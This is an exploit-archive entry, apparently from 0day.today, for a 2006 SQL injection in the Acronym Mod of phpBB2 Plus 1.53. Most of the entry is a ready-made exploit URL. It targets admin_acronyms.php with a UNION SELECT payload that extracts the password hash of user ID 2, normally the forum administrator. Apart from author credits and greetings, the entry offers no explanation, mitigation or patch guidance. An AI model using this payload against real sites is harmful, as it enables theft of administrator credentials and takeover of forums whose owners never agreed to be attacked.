id: 1335
date: 12/28/2006
title: phpBB2 Plus 1.53 (Acronym Mod) Remote SQL Injection Vulnerability
author: the master
cves: 

=================================================================
phpBB2 Plus 1.53 (Acronym Mod) Remote SQL Injection Vulnerability
=================================================================


########################################################################
#  Acronym Mod  v0.9.5  Remote SQL Injection Vulnerability
#
#  Download: http://www.codemonkeyx.net
#
#  Found By: the master
#
########################################################################
#  exploit:
#
# http://[Target]/[Path]/admin/admin_acronyms.php?mode=edit&id=-1%20UNION%20SELECT%20null,user_password,null%20FROM%20phpbb_users%20where%20user_id=2&sid=AdminHash
#
#  Greetz:   Dr Max Virus , Kacper
########################################################################



#  0day.today [2023-03-24]  #